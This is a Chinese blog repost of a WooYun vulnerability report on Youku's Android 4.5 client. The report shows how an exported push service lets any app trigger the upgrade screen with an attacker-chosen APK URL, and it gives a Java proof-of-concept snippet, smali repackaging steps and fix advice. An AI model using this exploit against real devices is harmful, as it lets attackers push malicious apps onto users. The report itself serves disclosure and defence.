优酷Android 4.5客户端升级漏洞

最新推荐文章于 2022-04-13 09:26:09 发布
最新推荐文章于 2022-04-13 09:26:09 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: Android安全 文章标签: 四大组件暴露 伪造升级

优酷Android 4.5客户端升级漏洞

MindMac @WooYun

简要描述

优酷Android 4.5客户端组件暴露导致第三方应用可以触发其升级过程,同时可以指定升级下载的URL地址,可导致任意应用安装!

详细说明

组件com.youku.service.push.StartActivityService声明如下:

<service
    android:label="Youku Push Notifications StartActivityService"
    android:name="com.youku.service.push.StartActivityService"
    android:exported="true"
>
可知该组件对外暴露。
该组件对应的代码执行部分如下: 

protected void onHandleIntent(Intent intent) {

        Intent v0;

        String v23;

        Serializable pushMsg = intent.getSerializableExtra("PushMsg");

        ......

        AppVersionManager.getInstance(Youku.context).showAppAgreementDialog();

        switch(pushMsg.type) {

            case 1: {

                goto label_53;

            }

            ......

        }

        ......

    label_53:

        intent.setFlags(876609536);

        intent.setClass(this, UpdateActivity.class);

        intent.putExtra("updateurl", pushMsg.updateurl);

        intent.putExtra("updateversion", pushMsg.updateversion);

        intent.putExtra("updatecontent", pushMsg.updatecontent);

        intent.putExtra("updateType", 2);

        this.startActivity(intent);

        return;

    ......
该组件从Intent从获取名为PushMsg的Serializable的数据,并根据其成员type来执行不同的流程,当type值为1时,执行App的升级操作。升级所需的相关数据如app的下载地址等也是从该序列化数据中获取。升级的具体流程在com.youku.ui.activity.UpdateActivity中,简单分析后发现升级过程未对下载地址等进行判断,因此可以任意指定该地址。

漏洞证明

该漏洞触发的关键在于对PushMsg数据的控制,基本思路如下:

1.创建一个Android App程序,在主Activity中的关键代码如下:

PushMsg pushMsg = new PushMsg();

pushMsg.type = 1;

pushMsg.updateurl = "http://gdown.baidu.com/data/wisegame/41839d1d510870f4/jiecaojingxuan_51.apk";

pushMsg.updatecontent = "This is Fake";

		

Intent intent = new Intent();

intent.setClassName("com.youku.phone","com.youku.service.push.StartActivityService");

intent.putExtra("PushMsg", pushMsg);

startService(intent);
其中PushMsg类不需要完整实现,只需要编译通过即可;
2.反编译优酷客户端c中提取出PushMsg.smali;
3.反编译上述创建的APK文件,将原PushMsg类的smali文件替换为优酷中的PushMsg.smali文件,重新打包签名;
4.安装并运行重打包后的APK,会看到优酷的升级页面触发,如果设计的好的话,是可以诱导用户安装攻击者指定的APK文件的。


修复方案

组件不暴露、对升级地址进行判断、对下载的APK文件进行校验!





随笔日志
关注
专栏目录
App安全(一) Android防止升级过程被劫持和换包
Tamic (大白)
08-17 1万+
文/ Tamic 地址/ http://blog.csdn.net/sk719887916/article/details/52233112 前言APP 安全一直是开发者头痛的事情,越来越多的安全漏洞,使得开发者越来越重视app安全,目前app安全主要有由以下几部分APP组件安全Android 包括四大组件:Activitie、Service、Content Provider、Broadba
android app渗透测试-Activity、Service
LJFYYJ的博客
08-02 1936
android Activity、Service的部分攻击面介绍;通过aidl接口调用解题的CTF实例
优酷网 存在sql注入漏洞
swordheart的博客
04-13 252
漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-20: 细节向公众公开 简要描述: 优酷网 存在sql注入漏洞 详细说明: url: http://minisite.youku.com/septwolves/play.php?vid=9
Android完全禁止第三方软件安装的方法
热门推荐
杨涂涂的博客
09-06 7万+
产品不允许第三方软件安装,所以需要禁止掉APK的安装功能。一开始我把Packageinstaller.apk从系统里面删了,试了一下,放一个APK到SD卡,点击安装,确实安装不了!不过,通过PC端类似于“手机助手”的软件以及ADB命令还是可以安装APK,最后百度了一圈,花了一天时间,终于搞定!!
仿写的优酷客户端应用源码
weixin_34109408的博客
03-08 164
2019独角兽企业重金招聘Python工程师标准>>> ...
Mentor自动驾驶平台DRS360集中式处理架构
打怪升级ing
10-11 753
自动驾驶技术已经逐渐从概念车延伸到量产车。2016年十月,特斯拉宣布其配置了Autopilot 2.0的量产车已经具备SAE(国际自动机工程师学会,前译美国汽车工程师学会)五级自动驾驶所需的硬件能力,在软件成熟与法规允许以后,将可以实现完全自动驾驶功能,全程均不需人干预。   自动驾驶平台须具备感知、决策与控制的能力, 映射到硬件上就是传感器、处理器与执行器及其辅助电路。 随着自动驾驶级别的上...
Android Service Security
omnispace的博客
03-29 1135
0x00 科普 一个Service是没有界面且能长时间运行于后台的应用组件.其它应用的组件可以启动一个服务运行于后台,即使用户切换到另一个应用也会继续运行.另外,一个组件可以绑定到一个service来进行交互,即使这个交互是进程间通讯也没问题.例如,一个service可能处理网络事物,播放音乐,执行文件I/O,或与一个内容提供者交互,所有这些都在后台进行. 0x01 知识要点 生命周
Android项目应用源码-仿优酷Android客户端图片左右滑动源码
10-29
Android项目应用源码-仿优酷Android客户端图片左右滑动(自动滑动),android安卓实例应用源代码,仅供学习及设计参考。
仿优酷Android客户端图片左右滑动
05-27
仿优酷Android客户端图片左右滑动
仿优酷Android客户端图片左右滑动(自动滑动)
07-02
android studio开发app项目
Android 仿优酷Android客户端图片左右滑动Demo.zip
07-03
Android 仿优酷Android客户端图片左右滑动Demo.zip
仿优酷Android客户端图片左右滑动(自动滑动).zip
09-09
仿优酷Android客户端图片左右滑动(自动滑动).zip
精品推荐-2024年ClickHouse技术最佳应用实践资料(脱敏)PPT合集(30份).zip
最新发布
09-22
2024年ClickHouse技术最佳应用实践资料(脱敏)PPT合集,30份。 1、Clickhouse在安全行业产品的落地实践 2、vivo OLAP发展与应用实践 3、阿里云ClickHouse 企业版云原生Serverless 介绍 4、ClickHouse在vivo ABTest的应用实践 5、NineData面向ClickHouse数据集成实践 6、ClickHouse与大模型 7、ClickHouse数据管理与同步的关键技术 8、ClickHouse在可观测性的应用实践和优化 9、阿里云上ClickHouse存算分离架构分享 10、Clickhouse数据迁移踩坑与最佳实践分享 11、ClickHouse在B站标签和多维分析场景的实践 12、基于Clickhouse的DataOps实践 ……等等30份。
【高创新】基于鲸鱼优化算法WOA-TCN-Attention的用负荷预测算法研究Matlab实现.rar
09-22
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
【高创新】基于金枪鱼优化算法TSO-CNN-BiLSTM-Attention的用客流量预测算法研究Matlab实现.rar
09-22
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
学生宿舍管理规定.docx
09-22
学生宿舍管理规定.docx
杭州优酷文化娱乐公司介绍
09-04
抱歉,关于杭州优酷文化娱乐公司的信息并未直接在提供的引用内容中提及。然而,我们可以提到的是,虽然引用[1]提到了杭州与南京的文化和旅游情况,但并没有具体涉及杭州的优酷文化娱乐公司。而引用[2]提及的是网易...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值